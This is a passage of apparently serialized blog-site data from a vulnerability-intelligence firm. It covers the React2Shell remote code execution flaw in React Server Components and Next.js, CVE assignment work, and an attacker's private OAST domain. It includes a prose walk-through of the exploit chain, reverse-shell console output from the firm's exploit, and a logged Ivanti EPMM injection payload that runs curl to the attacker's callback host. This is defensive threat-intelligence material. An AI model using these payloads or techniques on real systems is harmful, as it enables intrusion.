",[47,25258,305],{"href":25259,"rel":25260},"https:\u002F\u002Fgithub.com\u002Fvercel\u002Fnext.js\u002Fsecurity\u002Fadvisories\u002FGHSA-9qr9-h5gf-34mp",[51]," advising users of stable 15.x and 16.x version streams to update to a fixed version immediately. Fixed versions of Next.js are 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, and 16.0.7. ",[1131,25263,13825],{}," The vulnerability was initially tracked in Next.js as ",[47,25266,25269],{"href":25267,"rel":25268},"https:\u002F\u002Fwww.cve.org\u002FCVERecord?id=CVE-2025-66478",[51],"CVE-2025-66478",", but that CVE identifier was rejected as a duplicate of CVE-2025-55182.",[993,25272,25274],{"id":25273},"follow-on-cves","Follow-on CVEs",[18,25276,25277],{},"On December 11, React developers announced two additional CVEs affecting React Server Components, neither of which results in remote code execution:",[22,25279,25280,25290,25296],{},[25,25281,25282,25285,25286,25289],{},[47,25283,25111],{"href":25109,"rel":25284},[51]," is an information leak vulnerability \"in specific configurations of React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1\" that allows for source code exposure of any Server Function; per the ",[47,25287,5359],{"href":25103,"rel":25288},[51],", exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument.",[25,25291,25292,25295],{},[47,25293,25116],{"href":25114,"rel":25294},[51]," is a deserialization vulnerability that allows for pre-authentication denial of service (DoS) in React Server Components versions 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1.",[25,25297,25298,25299,1246,25301,1255,25303,59],{},"Vulnerable packages for both vulnerabilities include ",[886,25300,25187],{},[886,25302,25192],{},[886,25304,25182],{},[18,25306,25307,25308,59],{},"For the latest information, please see ",[47,25309,25311],{"href":25103,"rel":25310},[51],"React's blog here",[61,25313,25315],{"id":25314},"vulncheck-rce-analysis","VulnCheck RCE analysis",[18,25317,25318],{},"Next.js includes a general mechanism for handling React Server Actions, which relies on React’s server-side Flight deserializer. In our testing for CVE-2025-55182, this deserialization logic appears to be reachable by default, without requiring the presence of user-defined Server Actions or any route-specific discovery. This is a result of the fact that Next.js uses server-side rendering (SSR) by default in vulnerable versions.",[18,25320,25321,25322,25325,25326,59],{},"CVE-2025-55182 stems from the use of the React Flight Protocol and the BusBoy HTTP handling library interacting with SSR in vulnerable Next.js applications. The React Flight Protocol handles SSR requests in a chunked manner, which enables React to incrementally update modified components from the SSR processing, and also allows chunks to reference each other. Before the vulnerability was patched, the React Flight Protocol did not validate that the object references were set to the correct object, which allows for the prototype to be reached from the Flight Protocol. Interestingly, the first chunk request also allows for the ",[886,25323,25324],{},"then"," function constructor to be overridden and directly called by ",[886,25327,16115],{},[18,25329,25330,25331,25334,25335,982,25337,25339,25340,25343],{},"Using the classic ",[886,25332,25333],{},"constructor.constructor"," trick, it is then possible to combine the previous ",[886,25336,25324],{},[886,25338,16115],{}," components to reach ",[886,25341,25342],{},"[native code]"," JavaScript generation. Initially this was a difficult sticking point for researchers: It was possible to generate machine code, but we were missing a step for actually getting the code to evaluate in order to prove arbitrary code execution.",[18,25345,25346,25347,25352,25353,25356,25357,25360,25361,25364,25365,25368],{},"The original vulnerability finder, ",[47,25348,25351],{"href":25349,"rel":25350},"https:\u002F\u002Fgithub.com\u002Flachlan2k\u002FReact2Shell-CVE-2025-55182-original-poc\u002Fblob\u002Fmain\u002F01-submitted-poc.js",[51],"lachlan2k",", along with GitHub user ",[47,25354,22084],{"href":22088,"rel":25355},[51],", identified that the Flight Protocol chunk resolution with ",[886,25358,25359],{},"$@"," syntax cleverly resolves its own chunk, and then further overrides ",[886,25362,25363],{},"Chunk.prototype.then",", allowing the object to be directly referenced and providing access to the ",[886,25366,25367],{},"initializeModelChunk"," properties.",[18,25370,25371,25372,25375,25376,25378,25379,25381,25382,25385,25386,25389,25390,25393,25394,25397,25398,25401],{},"Lachlan2k discovered that it was possible to directly set the expected properties required for ",[886,25373,25374],{},"_request"," to validate by using multiple nested chunks that will properly resolve the types. In the maple3142 variant, this technique is then used again to recursively read the object in order to override the chunk’s ",[886,25377,25324],{}," value and a set of required values for ",[886,25380,25367],{}," properties for the associated ",[886,25383,25384],{},"_response"," field (and passing their validation checks). Both variants then use the React Flight Protocol ",[886,25387,25388],{},"$B"," type to initialize ",[886,25391,25392],{},"_prefix"," type for validation. Once all the chunk’s properties are validated and controlled, the final step is to override the prototype for the calls to ",[886,25395,25396],{},"_formData.get"," for the function ",[886,25399,25400],{},"response._formData.get(response._prefix + \"0\")",", which allows us to finally evaluate the generated native code.",[18,25403,25404],{},"In the end, it took two recursive calls through the React Flight Protocol and multiple nested calls to achieve remote code execution. Our exploit is fully weaponized and results in a reverse shell:",[1354,25406,25409],{"className":25407,"code":25408,"language":1359,"meta":219},[1357],"❯ .\u002Fbuild\u002FCVE-2025-55182_linux-arm64 -e -c2 SSLShellServer -rhost 127.0.0.1 -rport 3002 -lhost 127.0.0.1 -lport 8888\ntime=2025-12-04T17:49:38.018-05:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2025-12-04T17:49:38.119-05:00 level=STATUS msg=\"Starting TLS listener on 127.0.0.1:8888\"\ntime=2025-12-04T17:49:38.119-05:00 level=STATUS msg=\"Starting target\" index=0 host=127.0.0.1 port=3002 ssl=false \"ssl auto\"=false\ntime=2025-12-04T17:49:39.868-05:00 level=SUCCESS msg=\"Caught new shell from 127.0.0.1:47158\"\ntime=2025-12-04T17:49:39.868-05:00 level=STATUS msg=\"Active shell from 127.0.0.1:47158\"\n$ id\nuid=1000(parallels) gid=1000(parallels) groups=1000(parallels),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)\ntime=2025-12-04T17:49:48.120-05:00 level=SUCCESS msg=\"Exploit successfully completed\" exploited=true\nexit\ntime=2025-12-04T17:50:00.784-05:00 level=STATUS msg=\"C2 received shutdown, killing server and client sockets for SSL shell server\"\ntime=2025-12-04T17:50:00.784-05:00 level=STATUS msg=\"Connection closed: 127.0.0.1:47158\"\ntime=2025-12-04T17:50:00.784-05:00 level=STATUS msg=\"C2 server exited\"\n",[886,25410,25408],{"__ignoreMap":219},[18,25412,25413],{},"As usual, our research team analyzed and summarily discarded many of the early public PoCs, most of which were AI-generated or fake (or derivatives of something AI-generated or fake). Several early PoCs demonstrated contrived exploitation scenarios that didn't represent real-world attack paths. Detections based on fake or contrived PoCs are likely to return false negatives or otherwise generate bad data. Many organizations have also struggled to precisely fingerprint vulnerable React and Next.js applications, which is evident in the sky-high ASM query results we've seen posted to gauge internet exposure (i.e., millions). Our team has ASM queries available to Initial Access Intelligence customers that significantly narrows results down to limit false positives (and filters out many of the honeypot results on the public internet).",[61,25415,25417],{"id":25416},"vulncheck-customers","VulnCheck customers",[18,25419,25420],{},"The following artifacts are available to Initial Access Intelligence customers:",[22,25422,25423,25431,25434,25437,25440,25443,25450,25453],{},[25,25424,25425,25426,25430],{},"A weaponized unauthenticated remote code execution exploit, along with associated PCAPs, Suricata, and Snort rules — network rules have also been updated to detect PoC variants ",[47,25427,25429],{"href":22131,"rel":25428},[51],"released"," by the vulnerability finder",[25,25432,25433],{},"As of December 10, the team has progressively added exploit support for seven different React2Shell variants, including Next.js (bash), Next.js in memory, Next.js with Unicode obfuscation, React RSC, React Router (with experimental RSC support enabled), Expo (with experimental RSC support enabled), and Waku",[25,25435,25436],{},"Accompanying signatures and PCAPs are available for all variants",[25,25438,25439],{},"Targeted ASM queries for vulnerable Next.js applications",[25,25441,25442],{},"A targeted vulnerability check to identify vulnerable Next.js applications",[25,25444,25445,25446,25449],{},"A PCAP and Suricata and Snort rules for the specific version scanner ",[47,25447,25429],{"href":22896,"rel":25448},[51]," by SearchLight Cyber",[25,25451,25452],{},"A PCAP and Suricata and Snort rules for VulnCheck's own vulnerability check",[25,25454,23366],{},[18,25456,25457],{},"As always, VulnCheck vulnerability and exploit data continues to update with the latest intelligence and artifacts.",[61,25459,202],{"id":201},[18,25461,25462,25463,1246,25466,1255,25469,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and curate. Additional insight into React2Shell exploitation, PoCs, and payloads can be found in the following blogs: ",[47,25464,21687],{"href":20134,"rel":25465},[51],[47,25467,21694],{"href":21690,"rel":25468},[51],[47,25470,21701],{"href":21697,"rel":25471},[51],[18,25473,1228,25474,1234,25477,1240,25480,1246,25483,1255,25486,59],{},[47,25475,1233],{"href":10806,"rel":25476},[51],[47,25478,1239],{"href":1237,"rel":25479},[51],[47,25481,1245],{"href":1243,"rel":25482},[51],[47,25484,1251],{"href":1249,"rel":25485},[51],[47,25487,216],{"href":1258,"rel":25488},[51],{"title":219,"searchDepth":220,"depth":220,"links":25490},[25491,25494,25497,25498,25499],{"id":11272,"depth":220,"text":11273,"children":25492},[25493],{"id":25141,"depth":1266,"text":25142},{"id":25166,"depth":220,"text":25167,"children":25495},[25496],{"id":25273,"depth":1266,"text":25274},{"id":25314,"depth":220,"text":25315},{"id":25416,"depth":220,"text":25417},{"id":201,"depth":220,"text":202},"On December 3, 2025, React developers disclosed CVE-2025-55182 (React2Shell), an unauthenticated remote code execution vulnerability with a CVSS score of 10 that affects React Server Components and Next.js. This blog post provides an overview of the vulnerability, RCE path, research analysis, and recommended actions.",{"slug":25502},"cve-2025-55182-react-nextjs","\u002Fblog\u002Fcve-2025-55182-react-nextjs",{"title":25040,"description":25500},"blog\u002Fcve-2025-55182-react-nextjs",[1280,242,1279],"ixoo2g5WB1-H9Zp1NaVMnpmwyOatV64leLOs6ioisNM",{"id":25509,"title":25510,"articles":7,"authors":25511,"body":25513,"date":25658,"description":25659,"extension":234,"image":7,"link":7,"meta":25660,"navigation":237,"path":25662,"seo":25663,"series":7,"stem":25664,"subtype":7,"tags":25665,"__hash__":25666},"blog\u002Fblog\u002Fhelping-scale-cve.md","Helping Improve and Scale the CVE Ecosystem Through the Lens of Security Research",[25512],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":25514,"toc":25649},[25515,25522,25526,25529,25535,25539,25542,25548,25551,25554,25557,25565,25569,25572,25575,25578,25583,25590,25594,25597,25600,25606,25610,25613,25616,25625,25631,25635,25638,25640,25642,25644],[18,25516,25517,25518,25521],{},"VulnCheck is committed to accelerating visibility and improving data quality for defenders. We support the CVE Program and continue to expand our contributions by assigning CVE IDs to vulnerabilities observed by, discovered by, or reported to VulnCheck. In addition to assigning CVE IDs, VulnCheck also coordinates disclosure on behalf of security researchers through our free ",[47,25519,3001],{"href":2999,"rel":25520},[51]," service, which removes the burden of coordinated disclosure from the individuals who discover vulnerabilities.",[61,25523,25525],{"id":25524},"assigning-cves-to-real-world-threats","Assigning CVE’s to Real World Threats",[18,25527,25528],{},"At VulnCheck Research, we routinely observe, discover and analyze vulnerabilities that have not yet been assigned a CVE. These often include cases where there is a real-world threat, such as publicly available exploits, weaponized exploit code, or confirmed exploitation activity observed by VulnCheck canaries or third parties, including ShadowServer. The chart below highlights VulnCheck assigned CVEs to date and the threat profile of each vulnerability.",[18,25530,25531],{},[68,25532],{":width":10862,"alt":25533,"src":25534},"VulnCheck CNA Published CVEs","\u002Fblog\u002Fhelping-scale-cve\u002Fvulncheck-cna-cves.png",[61,25536,25538],{"id":25537},"the-need-for-cve-assignment-both-old-and-new","The Need for CVE Assignment Both Old and New",[18,25540,25541],{},"We frequently research, discover, and observe both new and older vulnerabilities that are known to be exploited, weaponized, or have publicly available proof-of-concept code. This chart illustrates that newer vulnerabilities are not the only ones posing real-world risk, and that assigning CVEs is important for both older and more recent issues.",[18,25543,25544],{},[68,25545],{":width":10862,"alt":25546,"src":25547},"VulnCheck Published CVEs by CVE-Year","\u002Fblog\u002Fhelping-scale-cve\u002Fvulncheck-cves-by-year.png",[18,25549,25550],{},"*In late June, we began assigning CVEs with the “CVE-YEAR” prefix based on the year the vulnerability originally became public. As a result, many known exploited or weaponized vulnerabilities that received a CVE with the “CVE-2025” prefix are actually older vulnerabilities.",[18,25552,25553],{},"As part of our broader effort to close gaps in CVE coverage, we partnered with ShadowServer to assign CVEs to vulnerabilities they observed being exploited in the wild, but that had never received an identifier. We issued CVEs for these vulnerabilities, which were actively exploited despite most having been disclosed in previous years.",[18,25555,25556],{},"We also assigned hundreds of CVEs to vulnerabilities with Metasploit modules to ensure that widely used and easily weaponized vulnerabilities receive the CVE coverage defenders rely on.",[18,25558,25559,25560],{},"If you are interested in exploring older vulnerabilities that are actively being exploited, the ShadowServer Exploited Vulnerabilities Dashboard provides visibility into hundreds of such cases: ",[47,25561,25564],{"href":25562,"rel":25563},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmonitoring\u002F?category=monitoring&statistic=unique_ips&limit=1000",[51],"ShadowServer Exploited Vulnerabilities Dashboard",[61,25566,25568],{"id":25567},"coordinated-disclosure-and-cve-assignment","Coordinated Disclosure and CVE Assignment",[18,25570,25571],{},"We understand that coordinating with software suppliers can be challenging for security researchers. Our focus is on helping reduce the burden researchers face when reporting vulnerabilities. VulnCheck offers a free vulnerability reporting service that supports responsible disclosure.",[18,25573,25574],{},"Security researchers commonly encounter several obstacles, including limited responsiveness and in some cases, even combative behavior from software suppliers when researchers submit vulnerability reports.",[18,25576,25577],{},"Here is an example of a security researcher, Chocapikk, reporting a vulnerability to VulnCheck for responsible disclosure. After receiving no reply from the vendor, the security researcher reported the vulnerability to VulnCheck, who attempted to coordinate with the software vendor.",[18,25579,25580],{},[68,25581],{":width":10862,"alt":23717,"src":25582},"\u002Fblog\u002Fhelping-scale-cve\u002Fcve-2025-2611.png",[18,25584,25585,25586,25589],{},"After coordinating with the researcher to disclose the vulnerability, VulnCheck issued a CVE, validated the vulnerability with a weaponized exploit and built detection rules. With these detection rules, VulnCheck was able to confirm real world exploitation of the vulnerability through our Canary Intelligence service and the vulnerability was added to ",[47,25587,1233],{"href":2871,"rel":25588},[51],", a free service we provide to the security community.",[61,25591,25593],{"id":25592},"researching-publicly-disclosed-vulnerabilities-that-didnt-get-a-cve-assigned","Researching Publicly Disclosed Vulnerabilities That Didn’t Get a CVE Assigned",[18,25595,25596],{},"As our research team reviews hundreds of vulnerability intelligence sources, we often discover older publicly disclosed vulnerabilities that have no CVE assignment. Ensuring these issues receive a CVE is important because defenders rely on that visibility to understand and respond to potential threats.",[18,25598,25599],{},"For example, we published CVE-2018-25120 in October, a vulnerability that first had an exploit released in January 2017 and was later added to ExploitDB. Our analysis confirmed that this vulnerability was being used in the wild through VulnCheck Canary Intelligence. As a result, it was added to VulnCheck KEV, giving defenders critical insight into a real-world threat targeting technology that is more than a decade old.",[18,25601,25602],{},[68,25603],{":width":10862,"alt":25604,"src":25605},"CVE-2018-25120","\u002Fblog\u002Fhelping-scale-cve\u002Fcve-2018-25120.png",[61,25607,25609],{"id":25608},"improving-data-quality-through-cve-enrichment","Improving Data Quality through CVE Enrichment",[18,25611,25612],{},"Data quality is essential for CVE consumers, enabling them to efficiently identify, detect, and prioritize vulnerabilities across the various tools in their environments. We recognize both the importance of assigning CVEs to all vulnerabilities and of enriching those CVE records with meaningful, actionable information.",[18,25614,25615],{},"With the recent expansion of our vulnerability research team, we conducted an audit of our CVE records to ensure we consistently provide key enrichments, such as Patch Information and Common Platform Enumeration (CPE). Patch information helps defenders understand how to remediate vulnerabilities, while CPE data supports accurate detection and identification of vulnerabilities within an organization’s environment.",[18,25617,25618,25619,25624],{},"Following this audit, we used ",[47,25620,25623],{"href":25621,"rel":25622},"https:\u002F\u002Fcnascorecard.org\u002Fcna\u002Fcna-detail.html?shortName=VulnCheck",[51],"CNA ScoreCard"," to benchmark our record completeness against other CVE Numbering Authorities (CNAs) within the CVE Program. As a result of our efforts, we increased our overall completeness score to 91%, placing VulnCheck among the top seven CNAs. We issued the largest number of CVEs of any CNA achieving this level of CVE record completeness.",[18,25626,25627],{},[68,25628],{":width":10862,"alt":25629,"src":25630},"CNA Scorecard","\u002Fblog\u002Fhelping-scale-cve\u002Fcnascorecard.png",[61,25632,25634],{"id":25633},"scaling-resources-to-contribute-back-to-the-cve-program","Scaling Resources to contribute back to the CVE Program",[18,25636,25637],{},"We are committed to investing in resources that give defenders broader visibility into real world threats through the CVE Program. To support this commitment, we have expanded our team and strengthened our public service and research efforts. This includes increasing our research capabilities, improving our CVE processing capacity, dedicating resources to coordinated disclosure, and investing in new tooling that will automate and streamline our ability to manage higher volumes of reported vulnerabilities and CNA CVE issuance.",[61,25639,202],{"id":201},[18,25641,205],{},[18,25643,208],{},[18,25645,211,25646,217],{},[47,25647,216],{"href":214,"rel":25648},[51],{"title":219,"searchDepth":220,"depth":220,"links":25650},[25651,25652,25653,25654,25655,25656,25657],{"id":25524,"depth":220,"text":25525},{"id":25537,"depth":220,"text":25538},{"id":25567,"depth":220,"text":25568},{"id":25592,"depth":220,"text":25593},{"id":25608,"depth":220,"text":25609},{"id":25633,"depth":220,"text":25634},{"id":201,"depth":220,"text":202},"2025-12-02","VulnCheck is committed to accelerating visibility and improving data quality for defenders. We support the CVE Program and continue to expand our contributions by assigning CVE IDs to vulnerabilities observed by, discovered by, or reported to VulnCheck.",{"slug":25661},"helping-scale-cve","\u002Fblog\u002Fhelping-scale-cve",{"title":25510,"description":25659},"blog\u002Fhelping-scale-cve",[242,1280,1279],"wcUM9vh4_eNgb7-k_QaN4IxRdH3wEXZGFGvfu3Jpg4I",{"id":25668,"title":10793,"articles":25669,"authors":25688,"body":25690,"date":28138,"description":28139,"extension":234,"image":7,"link":7,"meta":28140,"navigation":237,"path":28142,"seo":28143,"series":7,"stem":28144,"subtype":7,"tags":28145,"__hash__":28146},"blog\u002Fblog\u002Fmystery-oast.md",[25670,25675,25679,25683],{"title":25671,"source":25672,"link":25673,"date":25674},"Mystery OAST Tool Exploits 200 CVEs Using Google Cloud for Large-Scale Attacks","GBHackers","https:\u002F\u002Fgbhackers.com\u002Fmystery-oast-tool-exploits-200-cves\u002F","2025-11-29",{"title":25676,"source":25677,"link":25678,"date":25674},"OAST-Based Exploit Platform Targets 200 CVEs via Google Cloud Resources","Cyber Press","https:\u002F\u002Fcyberpress.org\u002Foast-based-exploit-platform-targets-200-cves\u002F",{"title":25680,"source":14382,"link":25681,"date":25682},"CISA Adds Actively Exploited XSS Bug CVE-2021-26829 in OpenPLC ScadaBR to KEV","https:\u002F\u002Fthehackernews.com\u002F2025\u002F11\u002Fcisa-adds-actively-exploited-xss-bug.html","2025-11-30",{"title":25684,"source":25685,"link":25686,"date":25687},"Mystery OAST With Exploit for 200 CVEs Leveraging Google Cloud to Launch Attacks","CyberSecurityNews","https:\u002F\u002Fcybersecuritynews.com\u002Fmystery-oast-with-exploit-for-200-cves\u002F#google_vignette","2025-12-01",[25689],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":25691,"toc":28136},[25692,25695,25697,25708,25711,25715,25718,25735,25738,25755,26030,26033,26060,26068,26071,26123,26126,26164,27152,27158,27164,27189,27192,28080,28083,28085,28088,28091,28093,28113,28133],[263,25693],{":list":25694,"ico":266,"title":20},"[\"VulnCheck Canary Intelligence observed a long-running, attacker-operated OAST service on Google Cloud driving a focused exploit operation.\",\"The actor mixes stock Nuclei templates with custom payloads to broaden their reach.\",\"All observed activity targeted canaries deployed in Brazil, suggesting a deliberate regional focus.\"]",[1920,25696,11273],{"id":11272},[18,25698,25699,25700,25703,25704,25707],{},"Out-of-band application security testing (OAST) endpoints are widely used in internet-wide exploit scanning, and most actors rely on public services like oast.fun because they require no infrastructure. That is why callbacks to ",[886,25701,25702],{},"detectors-testing.com"," in VulnCheck’s ",[47,25705,283],{"href":281,"rel":25706},[51]," traffic stood out. An attacker appeared to be running a private OAST domain and using it in a regionally focused exploit operation.",[18,25709,25710],{},"We observed roughly 1,400 exploit attempts spanning more than 200 CVEs linked to this infrastructure. While most of the activity resembled standard Nuclei templates, the attacker’s hosting choices, payloads, and regional targeting did not align with typical OAST use.",[1920,25712,25714],{"id":25713},"an-unfamiliar-oast","An Unfamiliar OAST",[18,25716,25717],{},"OAST makes it easy for attackers to verify command execution, SSRF, deserialization, and other classes of vulnerabilities. Commodity scanners like Nuclei typically use public services for this purpose, and their callbacks usually look like:",[22,25719,25720,25725,25730],{},[25,25721,25722],{},[886,25723,25724],{},"\u003Crandom>.oast.pro",[25,25726,25727],{},[886,25728,25729],{},"\u003Crandom>.oast.me",[25,25731,25732],{},[886,25733,25734],{},"\u003Crandom>.interact.sh",[18,25736,25737],{},"So when VulnCheck’s canaries began observing OAST callbacks to subdomains of i-sh.detectors-testing.com, a domain we had never seen before, the pattern stood out. This is not a known OAST provider or anything referenced by popular scanning frameworks.",[18,25739,25740,25741,25744,25745,25750,25751,25754],{},"For example, the entry below from our ",[47,25742,283],{"href":281,"rel":25743},[51]," data shows an exploit attempt for ",[47,25746,25749],{"href":25747,"rel":25748},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-4428",[51],"CVE-2025-4428"," (Ivanti EPMM). If the exploit were successful, the compromised host would issue an HTTP request to ",[886,25752,25753],{},"d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com",", one of the attacker’s OAST subdomains:",[1354,25756,25758],{"className":22307,"code":25757,"language":22309,"meta":219,"style":219},"{\n \"src_ip\": \"34.172.194.72\",\n \"src_port\": 32902,\n \"src_country\": \"US\",\n \"dst_country\": \"BR\",\n \"cve\": \"CVE-2025-4428\",\n \"signature_id\": 12700562,\n \"signature\": \"VULNCHECK Ivanti Endpoint Manager Mobile CVE-2025-4428 Exploit Attempt (RCE)\",\n \"category\": \"Web Application Attack\",\n \"severity\": 1,\n \"payload\": \"R0VUIC9hcGkvdjIvZmVhdHVyZXVzYWdlP2FkbWluRGV2aWNlU3BhY2VJZD0xMzEmZm9ybWF0PSUyNCU3YicnLmdldENsYXNzKCkuZm9yTmFtZSgnamF2YS5sYW5nLlJ1bnRpbWUnKS5nZXRNZXRob2QoJ2dldFJ1bnRpbWUnKS5pbnZva2UoJycuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZhLmxhbmcuUnVudGltZScpKS5leGVjKCdjdXJsJTIwZDRicXNkNmU0N21vNDdkOTNscGdxNTVkM2oxMTF5NmVtLmktc2guZGV0ZWN0b3JzLXRlc3RpbmcuY29tJyklN2QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV8zKSBBcHBsZVdlYktpdC82MDUuMS4xNSAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vOS4xLjIgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiBKU0VTU0lPTklEPTNFMTlEREE0ODY4MjEyQzM4RTQxRkIzQjdFMDc5QzdEDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K\",\n \"http\": {\n \"url\": \"\u002Fapi\u002Fv2\u002Ffeatureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com')%7d\",\n \"http_user_agent\": \"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F9.1.2 Safari\u002F605.1.15\",\n \"protocol\": \"HTTP\u002F1.1\"\n },\n \"timestamp\": \"2025-11-18T15:59:29.982Z\"\n}\n",[886,25759,25760,25764,25783,25798,25816,25835,25853,25868,25887,25905,25919,25938,25950,25969,25988,26005,26009,26026],{"__ignoreMap":219},[1373,25761,25762],{"class":1375,"line":1376},[1373,25763,8904],{"class":1383},[1373,25765,25766,25768,25770,25772,25774,25776,25779,25781],{"class":1375,"line":220},[1373,25767,23732],{"class":9152},[1373,25769,23735],{"class":9155},[1373,25771,183],{"class":9152},[1373,25773,4606],{"class":1383},[1373,25775,4883],{"class":9173},[1373,25777,25778],{"class":9176},"34.172.194.72",[1373,25780,183],{"class":9173},[1373,25782,9062],{"class":1383},[1373,25784,25785,25787,25789,25791,25793,25796],{"class":1375,"line":1266},[1373,25786,23732],{"class":9152},[1373,25788,23754],{"class":9155},[1373,25790,183],{"class":9152},[1373,25792,4606],{"class":1383},[1373,25794,25795],{"class":5467}," 32902",[1373,25797,9062],{"class":1383},[1373,25799,25800,25802,25804,25806,25808,25810,25812,25814],{"class":1375,"line":1852},[1373,25801,23732],{"class":9152},[1373,25803,23770],{"class":9155},[1373,25805,183],{"class":9152},[1373,25807,4606],{"class":1383},[1373,25809,4883],{"class":9173},[1373,25811,23799],{"class":9176},[1373,25813,183],{"class":9173},[1373,25815,9062],{"class":1383},[1373,25817,25818,25820,25822,25824,25826,25828,25831,25833],{"class":1375,"line":4692},[1373,25819,23732],{"class":9152},[1373,25821,23790],{"class":9155},[1373,25823,183],{"class":9152},[1373,25825,4606],{"class":1383},[1373,25827,4883],{"class":9173},[1373,25829,25830],{"class":9176},"BR",[1373,25832,183],{"class":9173},[1373,25834,9062],{"class":1383},[1373,25836,25837,25839,25841,25843,25845,25847,25849,25851],{"class":1375,"line":4724},[1373,25838,23732],{"class":9152},[1373,25840,242],{"class":9155},[1373,25842,183],{"class":9152},[1373,25844,4606],{"class":1383},[1373,25846,4883],{"class":9173},[1373,25848,25749],{"class":9176},[1373,25850,183],{"class":9173},[1373,25852,9062],{"class":1383},[1373,25854,25855,25857,25859,25861,25863,25866],{"class":1375,"line":4756},[1373,25856,23732],{"class":9152},[1373,25858,23828],{"class":9155},[1373,25860,183],{"class":9152},[1373,25862,4606],{"class":1383},[1373,25864,25865],{"class":5467}," 12700562",[1373,25867,9062],{"class":1383},[1373,25869,25870,25872,25874,25876,25878,25880,25883,25885],{"class":1375,"line":4768},[1373,25871,23732],{"class":9152},[1373,25873,23844],{"class":9155},[1373,25875,183],{"class":9152},[1373,25877,4606],{"class":1383},[1373,25879,4883],{"class":9173},[1373,25881,25882],{"class":9176},"VULNCHECK Ivanti Endpoint Manager Mobile CVE-2025-4428 Exploit Attempt (RCE)",[1373,25884,183],{"class":9173},[1373,25886,9062],{"class":1383},[1373,25888,25889,25891,25893,25895,25897,25899,25901,25903],{"class":1375,"line":4792},[1373,25890,23732],{"class":9152},[1373,25892,23864],{"class":9155},[1373,25894,183],{"class":9152},[1373,25896,4606],{"class":1383},[1373,25898,4883],{"class":9173},[1373,25900,23873],{"class":9176},[1373,25902,183],{"class":9173},[1373,25904,9062],{"class":1383},[1373,25906,25907,25909,25911,25913,25915,25917],{"class":1375,"line":4798},[1373,25908,23732],{"class":9152},[1373,25910,23884],{"class":9155},[1373,25912,183],{"class":9152},[1373,25914,4606],{"class":1383},[1373,25916,5468],{"class":5467},[1373,25918,9062],{"class":1383},[1373,25920,25921,25923,25925,25927,25929,25931,25934,25936],{"class":1375,"line":4806},[1373,25922,23732],{"class":9152},[1373,25924,11736],{"class":9155},[1373,25926,183],{"class":9152},[1373,25928,4606],{"class":1383},[1373,25930,4883],{"class":9173},[1373,25932,25933],{"class":9176},"R0VUIC9hcGkvdjIvZmVhdHVyZXVzYWdlP2FkbWluRGV2aWNlU3BhY2VJZD0xMzEmZm9ybWF0PSUyNCU3YicnLmdldENsYXNzKCkuZm9yTmFtZSgnamF2YS5sYW5nLlJ1bnRpbWUnKS5nZXRNZXRob2QoJ2dldFJ1bnRpbWUnKS5pbnZva2UoJycuZ2V0Q2xhc3MoKS5mb3JOYW1lKCdqYXZhLmxhbmcuUnVudGltZScpKS5leGVjKCdjdXJsJTIwZDRicXNkNmU0N21vNDdkOTNscGdxNTVkM2oxMTF5NmVtLmktc2guZGV0ZWN0b3JzLXRlc3RpbmcuY29tJyklN2QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV8zKSBBcHBsZVdlYktpdC82MDUuMS4xNSAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vOS4xLjIgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiBKU0VTU0lPTklEPTNFMTlEREE0ODY4MjEyQzM4RTQxRkIzQjdFMDc5QzdEDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K",[1373,25935,183],{"class":9173},[1373,25937,9062],{"class":1383},[1373,25939,25940,25942,25944,25946,25948],{"class":1375,"line":4817},[1373,25941,23732],{"class":9152},[1373,25943,6277],{"class":9155},[1373,25945,183],{"class":9152},[1373,25947,4606],{"class":1383},[1373,25949,4765],{"class":1383},[1373,25951,25952,25954,25956,25958,25960,25962,25965,25967],{"class":1375,"line":4825},[1373,25953,19050],{"class":9152},[1373,25955,7585],{"class":9165},[1373,25957,183],{"class":9152},[1373,25959,4606],{"class":1383},[1373,25961,4883],{"class":9173},[1373,25963,25964],{"class":9176},"\u002Fapi\u002Fv2\u002Ffeatureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d4bqsd6e47mo47d93lpgq55d3j111y6em.i-sh.detectors-testing.com')%7d",[1373,25966,183],{"class":9173},[1373,25968,9062],{"class":1383},[1373,25970,25971,25973,25975,25977,25979,25981,25984,25986],{"class":1375,"line":4835},[1373,25972,19050],{"class":9152},[1373,25974,23949],{"class":9165},[1373,25976,183],{"class":9152